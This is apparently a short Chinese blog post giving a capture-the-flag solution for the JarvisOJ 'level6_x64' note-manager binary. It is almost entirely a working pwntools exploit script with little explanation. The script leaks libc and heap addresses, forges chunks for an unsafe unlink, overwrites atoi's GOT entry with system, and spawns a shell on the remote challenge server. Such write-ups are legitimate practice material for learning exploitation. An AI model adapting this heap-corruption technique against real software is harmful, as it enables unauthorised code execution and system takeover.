[XMAN]level6_x64

nc pwn2.jarvisoj.com 9886

 

 

Hint1: 本题附件已更新,请大家重新下载以免影响解题。

 

level6_x64.rar.0bcca9516e27d7da23a26db801f12f4c

 

和Guestbook2一模一样

exp如下:

from pwn import *

def list_note():
    io.recvuntil('Your choice: ')
    io.sendline('1')

def new_note(note):
    io.recvuntil('Your choice: ')
    io.sendline('2')
    io.recvuntil('Length of new note: ')
    io.sendline(str(len(note)))
    io.recvuntil('Enter your note: ')
    io.send(note)

def edit_note(number, note):
    io.recvuntil('Your choice: ')
    io.sendline('3')
    io.recvuntil('Note number: ')
    io.sendline(str(number))
    io.recvuntil('Length of note: ')
    io.sendline(str(len(note)))
    io.recvuntil('Enter your note: ')
    io.send(note)

def delete_note(number):
    io.recvuntil('Your choice: ')
    io.sendline('4')
    io.recvuntil('Note number: ')
    io.sendline(str(number))

#io = process('./freenote_x64')
#io = gdb.debug('./freenote_x64', 'b *0x400998')
io = remote('pwn2.jarvisoj.com', 9886)
elf = ELF('./freenote_x64')
#libc = elf.libc
libc = ELF('./libc-2.19.so')
atoi_got = 0x602070
#main_arena = 0x3C4B20
main_arena = 0x3C2760

new_note(b'a' * 128)
new_note(b'b' * 128)
new_note(b'c' * 128)
new_note(b'd' * 128)
new_note(b'e' * 128)
delete_note(1)
delete_note(3)
edit_note(0, b'a' * 128 + b'b' * 0x10)
list_note()
io.recvuntil('b' * 0x10)
libc_addr = u64(io.recvline().strip().ljust(8, b'\x00'))
info("libc_addr:" + str(hex(libc_addr)))
libc_base = libc_addr - main_arena - 88
info("libc_base:" + str(hex(libc_base)))
system_addr = libc_base + libc.symbols['system']
info("system_addr" + str(hex(system_addr)))

edit_note(0, b'a' * 128 + b'b' * 0x18)
list_note()
io.recvuntil('b' * 0x18)
heap_addr = u64(io.recvline().strip().ljust(8, b'\x00'))
info("heap_addr:" + str(hex(heap_addr)))
heap_base = heap_addr - 0x19d0
info("heap_base:" + str(hex(heap_base)))
unlink_addr = heap_base + 0x30
info("unlink_addr:" + str(hex(unlink_addr)))

payload = p64(0x90) + p64(0x80) + p64(unlink_addr - 0x18) + p64(unlink_addr - 0x10)
payload = payload.ljust(0x80, b'\x00')
payload += p64(0x80) + p64(0x90)
payload = payload.ljust(0x80 * 2, b'\x00')
edit_note(0, payload)
delete_note(1)

payload = p64(2) + p64(1) + p64(0x100) + p64(heap_base + 0x18) + p64(1) + p64(8) + p64(atoi_got)
payload = payload.ljust(0x80 * 2, b'\x00')
edit_note(0, payload)
edit_note(1, p64(system_addr))

io.recvuntil('Your choice: ')
io.sendline('/bin/sh')

io.interactive()

 

posted @ 2021-07-17 21:56  hktk1643  阅读(58)  评论(0编辑  收藏  举报